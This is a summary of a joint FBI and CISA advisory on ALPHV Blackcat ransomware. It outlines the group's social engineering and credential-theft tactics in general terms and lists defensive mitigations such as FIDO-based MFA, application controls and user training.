#StopRansomware: ALPHV Blackcat

Summary

This joint Cybersecurity Advisory (CSA) issued by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) provides an update on the ALPHV Blackcat ransomware as a service (RaaS), which has compromised over 1000 entities worldwide, demanding over $500 million in ransom payments. The advisory includes known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with the ALPHV Blackcat RaaS.

The report highlights the advanced social engineering techniques used by the attackers, including posing as company IT staff to obtain credentials, deploying remote access software, and using legitimate remote access and tunneling tools. The TTPs include compromising accounts, obtaining credentials from password stores, and using open-source frameworks to obtain multifactor authentication credentials.

The advisory provides recommendations for mitigating the threat, including implementing secure remote access tools, applying recommendations for implementing multi-factor authentication, identifying and investigating abnormal activity, and implementing user training on social engineering and phishing attacks.

Mitigations

1. Implement application controls to manage and control execution of software.
2. Implement multi-factor authentication (MFA) with FIDO/WebAuthn or Public Key Infrastructure (PKI)-based MFA.
3. Identify, detect, and investigate abnormal activity using networking monitoring tools.
4. Implement user training on social engineering and phishing attacks.
5. Implement internal mail and messaging monitoring.
6. Install and maintain antivirus software.
7. Validate security controls by exercising, testing, and validating against the MITRE ATT&CK for Enterprise framework.

Validation

The advisory recommends testing security program performance against the MITRE ATT&CK techniques and continually testing in a production environment to ensure optimal performance.